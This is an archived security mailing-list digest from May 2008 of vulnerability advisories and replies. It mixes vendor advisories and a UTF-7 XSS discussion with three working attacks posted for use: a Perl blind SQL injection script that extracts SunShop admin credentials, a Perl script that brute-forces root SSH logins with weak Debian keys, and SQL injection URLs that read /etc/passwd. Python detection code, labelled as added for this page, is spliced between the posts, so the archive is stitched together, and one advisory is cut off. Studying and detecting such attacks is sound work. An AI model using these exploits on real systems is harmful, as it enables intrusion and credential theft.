ZDI-08-025: Symantec Altiris Deployment Solution Domain Credential Disclosure Vulnerability

2008-05-15 Thread zdi-disclosures
ZDI-08-025: Symantec Altiris Deployment Solution Domain Credential Disclosure Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-025
May 15, 2008

-- Affected Vendors:
Symantec

-- Affected Products:
Symantec Altiris Deployment Solution

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5936. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to remotely obtain domain
credentials on vulnerable installations of Symantec Altiris Deployment
Solution. User interaction is not required to exploit this vulnerability.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the axengine.exe service listening by
default on TCP port 402. The service allows a remote client to request
encrypted domain credentials without authentication. The encryption
lacks a salt allowing an attacker with a local installation of Altiris
Deployment Solution to easily decrypt the credentials.

-- Vendor Response:
Symantec has issued an update to correct this vulnerability. More
details can be found at:

http://www.symantec.com/avcenter/security/Content/2008.05.14a.html

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-05-15 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Brett Moore of Insomnia Security www.insomniasec.com

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


ZDI-08-024: Symantec Altiris Deployment Solution SQL Injection Vulnerability

2008-05-15 Thread zdi-disclosures
ZDI-08-024: Symantec Altiris Deployment Solution SQL Injection Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-024
May 15, 2008

-- Affected Vendors:
Symantec

-- Affected Products:
Symantec Altiris Deployment Solution

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5935. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Symantec Altiris Deployment Solution. User
interaction is not required to exploit this vulnerability.

The specific flaw exists within the axengine.exe process listening by
default on TCP port 402. A lack of proper sanitation while parsing
requests allows for a remote attacker to inject arbitrary SQL statements
into the database. Exploitation of this vulnerability can result in
arbitrary code execution under the context of the SYSTEM user.

-- Vendor Response:
Symantec has issued an update to correct this vulnerability. More
details can be found at:

http://www.symantec.com/avcenter/security/Content/2008.05.14a.html

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-05-15 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Brett Moore of Insomnia Security www.insomniasec.com



SunShop Version 3.5.1 Remote Blind Sql Injection

2008-05-15 Thread irvian . info
#!/usr/bin/perl -w

use LWP::UserAgent;

# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : [EMAIL PROTECTED]

print "\r\n[+]-[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-[+]\n\r";

if (@ARGV < 5){
die "

Cara Mengunakan : perl $0 host option id tabel itemid

Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10

\n";}

$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];

if ($option eq 1){
    syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
    syswrite(STDOUT, "password: ", 10);}

for($i = 1; $i <= 32; $i++){
    $f = 0;
    $n = 32;
    while(!$f && $n <= 57)
    {
        if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
            $f = 1;
            syswrite(STDOUT, chr($n), 1);
        }
        $n++;
    }
    if ($f==0){
        $n = 97;
        while(!$f && $n <= 122)
        {
            if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
                $f = 1;
                syswrite(STDOUT, chr($n), 1);
            }
            $n++;
        }
    }
}

print "\n[+]finish Execution Exploit\n";

sub blind {
    my $site = $_[0];
    my $op = $_[1];
    my $id = $_[2];
    my $tbl = $_[3];
    my $i = $_[4];
    my $n = $_[5];
    my $item = $_[6];

    if ($op eq 1){
        $klm = "username";
    }
    elsif ($op eq 2){
        $klm = "password";
    }

    my $ua = LWP::UserAgent->new;
    my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
    my $res = $ua->get($url);
    my $browser = $res->content;

    if ($browser !~ /This product is currently not viewable/i){
        return 1;
    }
    else {
        return 0;
    }
}


RE: Cisco Security Advisory: Cisco Unified Presence Denial of Service Vulnerabilities (UNCLASSIFIED)

2008-05-15 Thread Walker, Theresa A CIV DISA CSD
Classification:  UNCLASSIFIED 
Caveats: NONE

Please advise

Theresa 

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Cisco
Systems Product Security Incident Response Team
Sent: Wednesday, May 14, 2008 12:15 PM
To: bugtraq@securityfocus.com
Cc: [EMAIL PROTECTED]
Subject: Cisco Security Advisory: Cisco Unified Presence Denial of
Service Vulnerabilities

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Unified Presence Denial of Service
 Vulnerabilities

Advisory ID: cisco-sa-20080514-cup

Revision 1.0

+--------------------------------------------------------------------

Summary
=======

Cisco Unified Presence contains three denial of service (DoS)
vulnerabilities that may cause an interruption in presence services.
These vulnerabilities were discovered internally by Cisco, and there are
no workarounds.

Cisco has released free software updates that address these
vulnerabilities.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml.

Affected Products
=================

Vulnerable Products
+------------------

Cisco Unified Presence versions prior to 6.0(3) are affected by the
vulnerabilities described in this advisory.

Administrators of systems running all Cisco Unified Presence versions
can determine the software version by viewing the main page of the Cisco
Unified Presence Administration interface. The software version can be
determined by running the command show version active via the Command
Line Interface (CLI).

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
=======

Cisco Unified Presence collects information about a user's availability
status and communications capabilities. Using information captured by
Cisco Unified Presence, applications such as Cisco Unified Personal
Communicator and Cisco Unified Communications Manager can improve
productivity by helping users connect with colleagues more efficiently
by determining the most effective means for collaborative communication.

The Presence Engine service of Cisco Unified Presence version 1.0
contains two vulnerabilities that occur when a series of malformed IP
packets are received by a vulnerable Cisco Unified Presence system and
may result in a DoS condition. There are no workarounds for these
vulnerabilities. These vulnerabilities are fixed in Cisco Unified
Presence version 6.0(1). Cisco Unified Presence version 6.0(1) is the
upgrade path for Cisco Unified Presence version 1.0. The first
vulnerability is documented in CVE-2008-1158 and Cisco Bug ID
CSCsh50164. The second vulnerability is documented in CVE-2008-1740 and
Cisco Bug ID CSCsh20972.

The SIP Proxy service of Cisco Unified Presence versions 6.0(1) and
6.0(2) contains a vulnerability that occurs when a TCP port scan is
received by a vulnerable Cisco Unified Presence system and may result in
a DoS condition. There is no workaround for this vulnerability.
This vulnerability is fixed in Cisco Unified Presence version 6.0(3).
This vulnerability is documented in CVE-2008-1741 and Cisco Bug ID
CSCsj64533.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute
environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

* CSCsh50164 - PE Service core dumps when it receives malformed packets

CVSS Base Score - 7.8
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 6.4
    Exploitability    - Functional
    Remediation Level - Official-Fix
    Report Confidence - Confirmed

* CSCsh20972 - PE Service core dumps under stress test

CVSS Base Score - 7.8
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 6.4
    Exploitability    - Functional
    Remedia

Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability

2008-05-15 Thread Tom . Donovan
Setting the HTTP response header:

 Content-Type: text/html; charset=iso-8859-1


or adding the tag:

 


or even both - still does not deter IE from scanning the contents and 
interpreting them as UTF-7 when Encoding=Auto-Select.

(observed on w2k with IE 6.0.2800.1106 SP1 + Q867801 + Q823353 + Q833989 + 
Q903235)


It appears there is little that web servers can do to thwart this, short of 
changing all '+' characters to %2B.  That seems excessive.


-tom-


Aruba Mobility Controller TACACS User Authentication and Cross Site Scripting Vulnerabilities (Aruba Advisory ID: AID-051408)

2008-05-15 Thread Robbie (Rupinder) Gill

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Aruba Networks Security Advisory

Title: Aruba Mobility Controller TACACS User Authentication and Cross
Site Scripting Vulnerabilities

Aruba Advisory ID: AID-051408
Revision: 1.0

For Public Release on 05/14/2008


+

1.)

TITLE:  Mobility Controller TACACS User Authentication Vulnerability


SUMMARY

A user authentication vulnerability was discovered during standard bug
reporting procedures in the Aruba Mobility Controller.  This
vulnerability only affects customers using TACACS authentication for
Controller management users.

AFFECTED ArubaOS VERSIONS

~ 3.1.1.x, 3.2.0.x, 3.3.1.x and 3.1.1FIPS


DETAILS

Aruba Mobility Controllers may use external authentication methods to
authenticate users. A vulnerability in the TACACS authentication
component may allow unauthorized web UI/ssh/telnet access to the Aruba
Mobility Controller. TACACS is not the default authentication method and
must be configured as an authentication method for users before it will
be used. By default, user accounts and passwords are kept in a local
database which is not vulnerable to this issue.  Other authentication
methods supported by the Aruba Mobility Controller are not vulnerable to
this issue.

IMPACT

An attacker with web UI/ssh/telnet access to the Aruba Mobility
Controller may be able to gain unauthorized access to the administration
account of an Aruba Mobility Controller.


CVSS BASE METRIC SCORE: 10


WORKAROUNDS

Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical.  However, in the event that a patch
cannot immediately be applied, the following steps will help to
mitigate the risk:

- Disable TACACS authentication for all accounts until such time as the
patches can be applied.

- Do not expose the Mobility Controller administrative interface to
untrusted networks such as the Internet.


SOLUTION

Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical.  However, in the event that a patch
cannot immediately be applied, the workaround steps will help to
mitigate the risk.

+

2.)

TITLE:  Mobility Controller Web UI Cross Site Scripting Vulnerabilities


SUMMARY

Cross-site scripting vulnerabilities were discovered during standard bug
reporting procedures in the Aruba Mobility Controller. Certain malformed
inputs to the web UI allow the injection of cross-site scripting (XSS)
components, leading to a potential compromise of client web session
integrity.

AFFECTED ArubaOS VERSIONS

~ 2.5.5.x, 2.5.6.x, 2.4.8.x-FIPS, 3.1.1.x, 3.1.1.x-FIPS, 3.2.0.x, 3.3.1.x


DETAILS

Aruba Mobility Controllers may present a web-based management and
captive portal interface.  Providing malformed input to the web UI may
result in the presentation of that input to the user. Malicious XSS
injection via the web UI may not require action to be taken by the victim.


IMPACT

An attacker with web UI access to the Aruba Mobility Controller may be
able to compromise the integrity of a client web session or subvert the
authentication exchange content to retrieve administrator authentication
credentials to the Aruba Mobility Controller.


CVSS BASE METRIC SCORE: 10


WORKAROUNDS

Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical.  However, in the event that a patch
cannot immediately be applied, the following steps will help to
mitigate the risk:

- Do not expose the Mobility Controller administrative interface to
untrusted networks such as the Internet.


SOLUTION

Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical.  However, in the event that a patch
cannot immediately be applied, the workaround steps will help to
mitigate the risk.

+

OBTAINING FIXED FIRMWARES

Aruba customers can obtain the firmware on the support website:
http://www.arubanetworks.com/support.

Aruba Support contacts are as follows:

1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)

+1-408-754-1200 (toll call from anywhere in the world)

e-mail: support(at)arubanetworks.com

Please, do not contact either "wsirt(at)arubanetworks.com" or
"security(at)arubanetworks.com" for software upgrades.


EXPLOITATION AND PUBLIC ANNOUNCEMENTS

This vulnerability will be announced at

Aruba W.S.I.R.T. Advisory:
http://www.arubanetworks.com/support/alerts/aid-051408.asc

SecurityFocus Bugtraq
http://www.securityfocus.com/archive/1


STATUS OF THIS NOTICE: Final

Although Aruba Networks cannot guarantee the accuracy of all statements
in this advisory, all of the facts have been checked to the best of our
ability. Aruba Networks does not anticipate issuing updated versions of
this advisory unless there is some material change in the facts. Should
there be a

Debian generated SSH-Keys working exploit

2008-05-15 Thread mm
Hi Securityfocus,


The Debian OpenSSL issue means that only 65,536 possible SSH keys can be
generated, because the only entropy is the PID of the process generating the key.


As a result, the following Perl script can be used with the precalculated
SSH keys to brute-force the SSH login. It works if such a key is installed on
an unpatched Debian or any other system manually configured that way.


On an unpatched system, which doesn't need to be Debian, do the following:


1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2


2. Extract it to a directory


3. Enter into /root/.ssh/authorized_keys an SSH RSA key with 2048 bits,
generated on an unpatched Debian (this is the key this exploit will break)


4. Run the Perl script and give it the location where you extracted the
bzip2 mentioned.


#!/usr/bin/perl

my $keysPerConnect = 6;

unless ($ARGV[1]) {
   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
   print "By [EMAIL PROTECTED]";
   exit 0;
}

chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
   chomp;
   next unless m,^\d+$,;
   push(@a, $_);
   if (scalar(@a) > $keysPerConnect) {
      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
      @a = ();
   }
}


5. Enjoy the shell after some minutes (less than 20 minutes)


Regards,

Markus Mueller

[EMAIL PROTECTED]
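The script above presents a handful of candidate keys per connection and needs thousands of connections to walk the key space the post describes, which leaves a distinctive trail in sshd's auth log. The detector below is an added example for this page, not part of Markus Mueller's post: it parses constructed sshd log lines in OpenSSH's "Failed publickey for ... from ... port ... ssh2" / "Accepted publickey ..." format, counts public-key failures per source inside a sliding window, and reports sources that cross a threshold, noting whether an acceptance followed the burst. The window and threshold are assumed values to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth-log lines (not from any real host). 203.0.113.9 cycles
# through candidate keys for root, several per connection, and finally gets in;
# 198.51.100.20 is an ordinary user whose first offered key fails once.
SAMPLE_AUTH_LOG = """\
May 15 10:00:01 bastion sshd[2301]: Failed publickey for root from 203.0.113.9 port 40001 ssh2
May 15 10:00:01 bastion sshd[2301]: Failed publickey for root from 203.0.113.9 port 40001 ssh2
May 15 10:00:01 bastion sshd[2301]: Failed publickey for root from 203.0.113.9 port 40001 ssh2
May 15 10:00:02 bastion sshd[2304]: Failed publickey for root from 203.0.113.9 port 40002 ssh2
May 15 10:00:02 bastion sshd[2304]: Failed publickey for root from 203.0.113.9 port 40002 ssh2
May 15 10:00:02 bastion sshd[2304]: Failed publickey for root from 203.0.113.9 port 40002 ssh2
May 15 10:00:03 bastion sshd[2307]: Failed publickey for root from 203.0.113.9 port 40003 ssh2
May 15 10:00:03 bastion sshd[2307]: Accepted publickey for root from 203.0.113.9 port 40003 ssh2
May 15 10:02:10 bastion sshd[2350]: Failed publickey for alice from 198.51.100.20 port 51000 ssh2
May 15 10:02:11 bastion sshd[2350]: Accepted publickey for alice from 198.51.100.20 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) publickey for (?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+) ssh2"
)


def parse(log_text, year=2008):
    """Yield (timestamp, result, user, ip, port) for each publickey event.
    Syslog lines carry no year, so one is supplied by the caller."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"], int(m["port"])


def key_sweeps(log_text, window_seconds=60, threshold=5):
    """Return {ip: report} for sources with at least `threshold` publickey
    failures inside any `window_seconds` span. Each report gives the total
    failures, the number of distinct connections (source ports), when the
    burst was first detected, and the first Accepted seen after it."""
    failures = defaultdict(list)   # ip -> failure timestamps
    ports = defaultdict(set)       # ip -> source ports, one per connection
    burst_at = {}                  # ip -> time the threshold was crossed
    accepted_after = {}            # ip -> first success after the burst
    for ts, result, user, ip, port in parse(log_text):
        if result == "Failed":
            failures[ip].append(ts)
            ports[ip].add(port)
            recent = [t for t in failures[ip]
                      if (ts - t).total_seconds() <= window_seconds]
            if len(recent) >= threshold and ip not in burst_at:
                burst_at[ip] = ts
        elif ip in burst_at and ip not in accepted_after:
            accepted_after[ip] = {"user": user, "at": ts.strftime("%H:%M:%S")}
    return {
        ip: {
            "failures": len(failures[ip]),
            "connections": len(ports[ip]),
            "burst_detected_at": burst_at[ip].strftime("%H:%M:%S"),
            "accepted_after_burst": accepted_after.get(ip),
        }
        for ip in burst_at
    }
```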




Kostenloses Linkmanagementscript SQL Injection Vulnerabilities

2008-05-15 Thread hadihadi_zedehal_2006


#########################################################################
#  ...Kostenloses Linkmanagementscript SQL Injection Vulnerabilities...  #
#########################################################################


Virangar Security Team


www.virangar.net




Discovered By : virangar security team (hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) 

-


---vuln codes in:---

top_view.php:

line 3:  $id = $_GET['id'];
..
..
line 19: $voting_page_command_sql = "SELECT votings, worth FROM ".$tab_links." WHERE id = '".$id."'";

*

view.php:

line 8:  $id = $_GET['id'];
line 9:  $view_page_command_sql = "SELECT url, hits FROM ".$tab_links." WHERE id = '".$id."'";

---

exploits:

http://site.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*

http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*

---
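Both this post and the SunShop script earlier in the digest publish request URLs that a web-access-log review can recognise. The detector below is an added example written for this page, not code from either post: it runs over a few constructed Apache combined-log lines, URL-decodes each request, normalises the /**/ comment separators and %20 spaces the two payloads use, and flags the UNION/load_file pattern, the SUBSTRING(...)=CHAR(n) boolean probe, and the per-source burst of requests that differ only in the CHAR() value, which is the shape a blind extraction loop produces.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed Apache combined-log lines (not taken from any server): three
# requests shaped like the SunShop blind probe (only the CHAR() value changes),
# one shaped like the Linkmanagementscript UNION/load_file request, and two
# benign requests for comparison.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2008:10:01:01 +0000] "GET /cart/index.php?action=item&id=10'%20AND%20SUBSTRING((SELECT%20username%20FROM%20admin%20WHERE%20id=1),1,1)=CHAR(97)/* HTTP/1.1" 200 5120
203.0.113.7 - - [15/May/2008:10:01:02 +0000] "GET /cart/index.php?action=item&id=10'%20AND%20SUBSTRING((SELECT%20username%20FROM%20admin%20WHERE%20id=1),1,1)=CHAR(98)/* HTTP/1.1" 200 412
203.0.113.7 - - [15/May/2008:10:01:02 +0000] "GET /cart/index.php?action=item&id=10'%20AND%20SUBSTRING((SELECT%20username%20FROM%20admin%20WHERE%20id=1),1,1)=CHAR(99)/* HTTP/1.1" 200 412
198.51.100.4 - - [15/May/2008:10:05:10 +0000] "GET /links/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/* HTTP/1.1" 200 903
192.0.2.10 - - [15/May/2008:10:06:00 +0000] "GET /cart/index.php?action=item&id=10 HTTP/1.1" 200 5120
192.0.2.11 - - [15/May/2008:10:06:05 +0000] "GET /links/view.php?id=42 HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures run against the normalised request (decoded, comments collapsed,
# lower-cased), so the %20 and /**/ spacing tricks no longer matter.
SIGNATURES = {
    "boolean_extraction": re.compile(r"substring\s*\(\s*\(\s*select\b.*\)\s*=\s*char\s*\("),
    "union_select": re.compile(r"\bunion\s+select\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "trailing_comment": re.compile(r"/\*\s*$"),
}


def normalize_query(raw_path):
    """URL-decode the request, turn closed MySQL inline comments into spaces,
    and squeeze whitespace; a trailing unterminated /* is left in place."""
    text = unquote(raw_path)
    text = re.sub(r"/\*.*?\*/", " ", text)
    text = re.sub(r"\s+", " ", text)
    return text.lower()


def classify(raw_path):
    """Return the sorted names of the signatures that fire on one request."""
    query = normalize_query(raw_path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def analyze(log_text, burst_threshold=3):
    """Map each suspicious source IP to its sorted tags. 'blind_burst' is added
    when one source repeats the same request shape, with only the CHAR()
    argument changing, at least burst_threshold times."""
    tags_by_ip = defaultdict(set)
    shapes_by_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        tags_by_ip[ip].update(classify(path))
        query = normalize_query(path)
        if "char(" in query:
            shapes_by_ip[ip][re.sub(r"char\(\d+\)", "char(N)", query)] += 1
    findings = {}
    for ip in sorted(set(tags_by_ip) | set(shapes_by_ip)):
        tags = set(tags_by_ip.get(ip, ()))
        shapes = shapes_by_ip.get(ip)
        if shapes and max(shapes.values()) >= burst_threshold:
            tags.add("blind_burst")
        if tags:
            findings[ip] = sorted(tags)
    return findings
```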


Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability

2008-05-15 Thread lament hero
Hello,

Please try to understand what we did here.
You might be right in here:

"As all ISO, UTF-8 and related charsets were 7-bit clean, it's clear that
Microsoft err'ed on the side of accepting UTF-7 charset for automatic
detection in violation of RFC 2616."

But as I said in the 1st mail that I sent:

"We leave it to other hackers to upgrade the attack and make it fully
automatic."

I mean that Firefox will not show the XSS unless you change the encoding.
If it was "fully automatic" it could change the Firefox encoding, but
it's not; it's only a PoC.

Try to change Firefox to auto-select and refresh it so it will jump to UTF-7.

Yaniv Miron aka "Lament".


____________________________________________________________
Gentlemen,

With respect to http://www.securityfocus.com/bid/29112

Per http://www.ietf.org/rfc/rfc2616.txt

3.7.1 Canonicalization and Text Defaults
[...]
  The "charset" parameter is used with some media types to define the
  character set (section 3.4) of the data. When no explicit charset
  parameter is provided by the sender, media subtypes of the "text"
  type are defined to have a default charset value of "ISO-8859-1" when
  received via HTTP. Data in character sets other than "ISO-8859-1" or
  its subsets MUST be labeled with an appropriate charset value. See
  section 3.4.1 for compatibility problems.

Internet Explorer's autodetection of UTF-7 clearly violates this
specification, introducing the opportunity for myriad similar attacks.

There are several workarounds in Apache HTTP Server to prevent Microsoft's
vulnerability, including

AddDefaultCharset ISO-8859-1

or by enabling multilanguage error docs (with explicit charsets) by simply
uncommenting this Include directive of the default httpd.conf file;

# Multi-language error messages
Include conf/extra/httpd-multilang-errordoc.conf

All releases after Jan 2 include a global fix that adds an explicit
charset iso-8859-1 to compensate for Microsoft's vulnerability, including
2.2.8, 2.0.63, and 1.3.41.  However this vulnerability should clearly be
labeled as a flaw in Internet Explorer.

As all ISO, UTF-8 and related charsets were 7-bit clean, it's clear that
Microsoft erred on the side of accepting UTF-7 charset for automatic
detection in violation of RFC 2616.

We would be pleased to offer SecurityFocus the opportunity to correct this
misinformation before we raise the issue on the public discussion forums.

Bill
Apache HTTP Server
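The thread turns on two facts: RFC 2616 makes ISO-8859-1 the default only when no charset is declared, and a browser that sniffs instead will read "+ADw-"-style shifted runs as UTF-7 markup. The code below is an added example for this page, not code from any of the correspondents: sniffing_exposed flags text/* responses that declare no charset in the header or in a meta tag (the gap that AddDefaultCharset ISO-8859-1 closes on Apache), utf7_markup_in decodes shifted runs in a body to show what a sniffing browser would render, and utf7_shift is a small constructed helper that forces a string into one RFC 2152 shifted run so the checks have realistic input to work on.

```python
import base64
import re


def utf7_shift(text):
    """Encode text as a single UTF-7 shifted run ('+' base64(UTF-16BE) '-')
    with base64 padding removed. Used only to build constructed test input."""
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii")
    return "+" + b64.rstrip("=") + "-"


# Constructed responses (not captured from any server). UNLABELLED is the case
# the thread argues about: text/html with no charset declared anywhere, whose
# body carries a shifted run; LABELLED adds the explicit charset that an Apache
# AddDefaultCharset ISO-8859-1 directive would supply.
UNLABELLED = {
    "headers": {"Content-Type": "text/html"},
    "body": ("<html><body>Not Found: " + utf7_shift("<b>x</b>") + "</body></html>").encode("ascii"),
}
LABELLED = {
    "headers": {"Content-Type": "text/html; charset=iso-8859-1"},
    "body": UNLABELLED["body"],
}

CHARSET_IN_HEADER = re.compile(r";\s*charset\s*=\s*\"?([\w.:-]+)", re.I)
CHARSET_IN_META = re.compile(rb'<meta[^>]+charset\s*=\s*"?([\w.:-]+)', re.I)
SHIFTED_RUN = re.compile(rb"\+[A-Za-z0-9+/]+-?")


def charset_of(content_type):
    """Return the declared charset of a Content-Type value, lower-cased, or None."""
    m = CHARSET_IN_HEADER.search(content_type or "")
    return m.group(1).lower() if m else None


def sniffing_exposed(headers, body):
    """True for a text/* response with no charset in the header and none in a
    <meta> tag: the case RFC 2616 3.7.1 defaults to ISO-8859-1, and the case
    in which a sniffing browser decides the encoding for itself."""
    content_type = headers.get("Content-Type", "")
    if not content_type.lower().startswith("text/"):
        return False
    if charset_of(content_type):
        return False
    return CHARSET_IN_META.search(body) is None


def utf7_markup_in(body):
    """Decode every '+...-' run and return (run, decoded) pairs whose decoded
    text contains HTML metacharacters. Runs that are not valid UTF-7 (a lone
    '+5', 'C++', 'a+b-c') raise on decode and are skipped."""
    findings = []
    for m in SHIFTED_RUN.finditer(body):
        run = m.group(0)
        try:
            decoded = run.decode("utf-7")
        except UnicodeDecodeError:
            continue
        if any(ch in decoded for ch in "<>\"'"):
            findings.append((run.decode("ascii"), decoded))
    return findings


def review(response):
    """Combine both checks into the verdict a response scanner would report."""
    exposed = sniffing_exposed(response["headers"], response["body"])
    markup = utf7_markup_in(response["body"])
    return {"unlabelled_text": exposed, "utf7_markup": markup,
            "at_risk": exposed and bool(markup)}
```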